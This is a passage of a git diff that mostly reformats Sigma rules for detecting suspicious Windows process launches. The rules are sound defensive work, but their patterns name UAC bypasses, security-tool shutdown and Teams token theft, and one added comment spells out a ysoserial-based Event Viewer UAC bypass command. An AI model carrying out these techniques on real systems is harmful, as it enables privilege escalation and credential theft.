https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon author: frack113 @@ -19,17 +18,16 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: - - \Sysmon64.exe - - \Sysmon.exe - - Description: System activity monitor + - NewProcessName|endswith: + - \Sysmon64.exe + - \Sysmon.exe + - Description: System activity monitor selection_cli: - CommandLine|contains: + CommandLine|contains: - -u - /u condition: process_creation and (all of selection_*) falsepositives: - - Legitimate administrators might use this command to remove Sysmon for debugging - purposes + - Legitimate administrators might use this command to remove Sysmon for debugging purposes level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml index 8f2f9e403..d81b0b067 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml @@ -1,8 +1,7 @@ title: Potential Binary Impersonating Sysinternals Tools id: 7cce6fc8-a07f-4d84-a53e-96e1879843c9 status: test -description: Detects binaries that use the same name as legitimate sysinternals tools - to evade detection +description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite author: frack113 @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection_exe: - NewProcessName|endswith: + NewProcessName|endswith: - \accesschk.exe - \accesschk64.exe - \AccessEnum.exe @@ -172,7 +171,7 @@ detection: - Sysinternals - www.sysinternals.com - Sysinternals filter_empty: - Company: null + Company: condition: process_creation and (selection_exe and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml b/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml index f8edc7d8d..c0874a77c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml @@ -1,8 +1,7 @@ title: Sysprep on AppData Folder id: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e status: test -description: Detects suspicious sysprep process start with AppData folder as target - (as used by Trojan Syndicasec in Thrip report by Symantec) +description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) references: - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b @@ -20,11 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \AppData\ - NewProcessName|endswith: \sysprep.exe + CommandLine|contains: \AppData\ + NewProcessName|endswith: \sysprep.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml b/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml index 673823133..c1f10d0c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \systeminfo.exe - - OriginalFileName: sysinfo.exe + - NewProcessName|endswith: \systeminfo.exe + - OriginalFileName: sysinfo.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml b/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml index a12f7dbda..288eb97a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml +++ b/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml @@ -1,11 +1,10 @@ title: Potential Signing Bypass Via Windows Developer Features id: a383dec4-deec-4e6e-913b-ed9249670848 related: - - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 - type: similar + - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 + type: similar status: test -description: Detects when a user enable developer features such as "Developer Mode" - or "Application Sideloading". Which allows the user to install untrusted packages. +description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -21,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \SystemSettingsAdminFlows.exe - - OriginalFileName: SystemSettingsAdminFlows.EXE + - NewProcessName|endswith: \SystemSettingsAdminFlows.exe + - OriginalFileName: SystemSettingsAdminFlows.EXE selection_flag: - CommandLine|contains: TurnOnDeveloperFeatures + CommandLine|contains: TurnOnDeveloperFeatures selection_options: - CommandLine|contains: + CommandLine|contains: - DeveloperUnlock - EnableSideloading condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml b/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml index 643601b7a..e4b29a970 100644 --- a/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml +++ b/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml @@ -1,8 +1,7 @@ title: Suspicious Recursive Takeown id: 554601fb-9b71-4bcc-abf4-21a611be4fde status: test -description: Adversaries can interact with the DACLs using built-in Windows commands - takeown which can grant adversaries higher permissions on specific files and folders +description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '/f ' - /r - NewProcessName|endswith: \takeown.exe + NewProcessName|endswith: \takeown.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml b/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml index da81ed22f..6b08205e1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml @@ -1,8 +1,7 @@ title: Tap Installer Execution id: 99793437-3e16-439b-be0f-078782cf953d status: test -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunneling techniques +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2023/12/11 @@ -17,15 +16,15 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \tapinstall.exe + NewProcessName|endswith: \tapinstall.exe filter_optional_avast: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files\Avast Software\SecureLine VPN\ - :\Program Files (x86)\Avast Software\SecureLine VPN\ filter_optional_openvpn: - NewProcessName|contains: :\Program Files\OpenVPN Connect\drivers\tap\ + NewProcessName|contains: :\Program Files\OpenVPN Connect\drivers\tap\ filter_optional_protonvpn: - NewProcessName|contains: :\Program Files (x86)\Proton Technologies\ProtonVPNTap\installer\ + NewProcessName|contains: :\Program Files (x86)\Proton Technologies\ProtonVPNTap\installer\ condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - Legitimate OpenVPN TAP insntallation diff --git a/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml b/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml index e3c40bf25..04a72676c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml @@ -1,11 +1,9 @@ title: Compressed File Creation Via Tar.EXE id: 418a3163-3247-4b7b-9933-dcfcb7c52ea9 status: experimental -description: 'Detects execution of "tar.exe" in order to create a compressed file. - +description: | + Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - - ' references: - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Tar/ @@ -25,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tar.exe - - OriginalFileName: bsdtar + - NewProcessName|endswith: \tar.exe + - OriginalFileName: bsdtar selection_create: - CommandLine|contains: + CommandLine|contains: - -c - -r - -u diff --git a/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml b/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml index bd4683059..f571b23dc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml @@ -1,11 +1,9 @@ title: Compressed File Extraction Via Tar.EXE id: bf361876-6620-407a-812f-bfe11e51e924 status: experimental -description: 'Detects execution of "tar.exe" in order to extract compressed file. - +description: | + Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection. - - ' references: - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Tar/ @@ -25,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tar.exe - - OriginalFileName: bsdtar + - NewProcessName|endswith: \tar.exe + - OriginalFileName: bsdtar selection_extract: - CommandLine|contains: -x + CommandLine|contains: -x condition: process_creation and (all of selection_*) falsepositives: - Likely diff --git a/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml b/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml index 18aa97f9d..00376c140 100644 --- a/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml +++ b/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,17 +1,10 @@ title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: test -description: 'Detects one of the possible scenarios for disabling Symantec Endpoint - Protection. - - Symantec Endpoint Protection antivirus software services incorrectly implement - the protected service mechanism. - - As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command - several times ccSvcHst.exe /f, thereby killing the process belonging to the service, - and thus shutting down the service. - - ' +description: | + Detects one of the possible scenarios for disabling Symantec Endpoint Protection. + Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. + As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - https://www.exploit-db.com/exploits/37525 - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection @@ -29,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - taskkill - ' /F ' - ' /IM ' diff --git a/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml b/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml index f58a05987..d26db10b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml @@ -1,9 +1,7 @@ title: Suspicious Tasklist Discovery Command id: 63332011-f057-496c-ad8d-d2b6afb27f96 status: test -description: Adversaries may attempt to get information about running processes on - a system. Information obtained could be used to gain an understanding of common - software/applications running on systems within the network +description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist author: frack113 @@ -20,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: tasklist - - NewProcessName|endswith: \tasklist.exe - - OriginalFileName: tasklist.exe + - CommandLine|contains: tasklist + - NewProcessName|endswith: \tasklist.exe + - OriginalFileName: tasklist.exe condition: process_creation and selection falsepositives: - Administrator, hotline ask to user diff --git a/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml b/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml index 8fa2a412e..f28937bc5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml @@ -16,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - NewProcessName|endswith: \taskmgr.exe + NewProcessName|endswith: \taskmgr.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml index 8561d95b8..2f8bfe4e9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml @@ -18,7 +18,7 @@ detection: selection: ParentProcessName|endswith: \taskmgr.exe filter: - NewProcessName|endswith: + NewProcessName|endswith: - \resmon.exe - \mmc.exe - \taskmgr.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index dcf54ad41..0db4a2f2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -1,13 +1,9 @@ title: Potentially Suspicious Command Targeting Teams Sensitive Files id: d2eb17db-1d39-41dc-b57f-301f6512fa75 status: experimental -description: 'Detects a commandline containing references to the Microsoft Teams database - or cookies files from a process other than Teams. - - The database might contain authentication tokens and other sensitive information - about the logged in accounts. - - ' +description: | + Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. + The database might contain authentication tokens and other sensitive information about the logged in accounts. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens @@ -25,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - \Microsoft\Teams\Cookies - \Microsoft\Teams\Local Storage\leveldb filter_main_legit_locations: - NewProcessName|endswith: \Microsoft\Teams\current\Teams.exe + NewProcessName|endswith: \Microsoft\Teams\current\Teams.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml b/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml index 88337cebf..e37e96b82 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml @@ -17,9 +17,9 @@ detection: Channel: Security selection_img: OriginalFileName: TpmVscMgr.exe - NewProcessName|endswith: \tpmvscmgr.exe + NewProcessName|endswith: \tpmvscmgr.exe selection_cli: - CommandLine|contains: create + CommandLine|contains: create condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by an administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml b/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml index 9978f7abd..7a70a5245 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - NewProcessName|endswith: \tscon.exe + NewProcessName|endswith: \tscon.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml index 363da4fff..ea2fbe9ec 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml @@ -22,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' /dest:rdp-tcp#' + CommandLine|contains: ' /dest:rdp-tcp#' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml index d7604cdab..aa9e09615 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml @@ -16,8 +16,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tscon.exe - - OriginalFileName: tscon.exe + - NewProcessName|endswith: \tscon.exe + - OriginalFileName: tscon.exe selection_integrity: MandatoryLabel: S-1-16-16384 condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml index c8a06bfa4..d8b778bdf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \changepk.exe + NewProcessName|endswith: \changepk.exe ParentProcessName|endswith: \slui.exe MandatoryLabel: - S-1-16-12288 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml index 312dbd322..3acd4e7d5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml @@ -1,8 +1,7 @@ title: Bypass UAC via CMSTP id: e66779cc-383e-4224-a3a4-267eeb585c40 status: test -description: Detect commandline usage of Microsoft Connection Manager Profile Installer - (cmstp.exe) to install specially formatted local .INF files +description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files references: - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmstp.exe - - OriginalFileName: CMSTP.EXE + - NewProcessName|endswith: \cmstp.exe + - OriginalFileName: CMSTP.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - /s - -s - /au diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml index 4c3c6a995..d0ac1bd37 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml @@ -1,8 +1,7 @@ title: UAC Bypass Tools Using ComputerDefaults id: 3c05e90d-7eba-4324-9972-5d7f711a60a8 status: test -description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe - (UACMe 59) +description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -23,7 +22,7 @@ detection: MandatoryLabel: - S-1-16-12288 - S-1-16-16384 - NewProcessName: C:\Windows\System32\ComputerDefaults.exe + NewProcessName: C:\Windows\System32\ComputerDefaults.exe filter: ParentProcessName|contains: - :\Windows\System32 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml index cdb42a52d..516a79481 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Consent and Comctl32 - Process id: 1ca6bd18-0ba0-44ca-851c-92ed89a61085 status: test -description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll - (UACMe 22) +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \consent.exe - NewProcessName|endswith: \werfault.exe + NewProcessName|endswith: \werfault.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml index e1351d3f7..1d017a285 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using DismHost id: 853e74f9-9392-4935-ad3b-2e8c040dae86 status: test -description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe - 63) +description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml index 7aed4114a..6f6b525be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml @@ -1,8 +1,8 @@ title: UAC Bypass Using Event Viewer RecentViews id: 30fc8de7-d833-40c4-96b6-28319fbc4f6c related: - - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43 - type: similar + - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43 + type: similar status: test description: Detects the pattern of UAC Bypass using Event Viewer RecentViews references: @@ -21,11 +21,12 @@ detection: EventID: 4688 Channel: Security selection_path: - CommandLine|contains: + # Example: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe + CommandLine|contains: - \Event Viewer\RecentViews - \EventV~1\RecentViews selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml index 568686e57..55258915c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml @@ -1,8 +1,7 @@ title: Bypass UAC via Fodhelper.exe id: 7f741dcf-fc22-4759-87b4-9ae8376676a2 status: test -description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries - use this technique to execute privileged processes. +description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. references: - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml index b2f821f19..488ee201e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml @@ -23,8 +23,8 @@ detection: - S-1-16-12288 - S-1-16-16384 ParentProcessName|endswith: \ieinstal.exe - NewProcessName|contains: \AppData\Local\Temp\ - NewProcessName|endswith: consent.exe + NewProcessName|contains: \AppData\Local\Temp\ + NewProcessName|endswith: consent.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml index 2eaab17ef..e32af132f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: '"C:\Windows\system32\msconfig.exe" -5' + CommandLine: '"C:\Windows\system32\msconfig.exe" -5' MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml index 0857f7df4..76110e0e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using NTFS Reparse Point - Process id: 39ed3c80-e6a1-431b-9df3-911ac53d08a7 status: test -description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe - DLL hijacking (UACMe 36) +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -20,22 +19,21 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' - CommandLine|endswith: \AppData\Local\Temp\update.msu + CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' + CommandLine|endswith: \AppData\Local\Temp\update.msu MandatoryLabel: - S-1-16-12288 - S-1-16-16384 selection2: - ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart - /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' - CommandLine|contains|all: + ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Temp\ - \dismhost.exe { MandatoryLabel: - S-1-16-12288 - S-1-16-16384 - NewProcessName|endswith: \DismHost.exe + NewProcessName|endswith: \DismHost.exe condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml index 247a28c1a..6fabae67c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using PkgMgr and DISM id: a743ceba-c771-4d75-97eb-8a90f7f4844c status: test -description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe - 23) +description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \pkgmgr.exe - NewProcessName|endswith: \dism.exe + NewProcessName|endswith: \dism.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml index 03a5e24f8..8950c5c82 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml @@ -1,8 +1,7 @@ title: Potential UAC Bypass Via Sdclt.EXE id: 40f9af16-589d-4984-b78d-8c2aec023197 status: test -description: A General detection for sdclt being spawned as an elevated process. This - could be an indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: sdclt.exe + NewProcessName|endswith: sdclt.exe MandatoryLabel: S-1-16-12288 condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml index 2f349f1b6..5186bdf4e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml @@ -19,7 +19,7 @@ 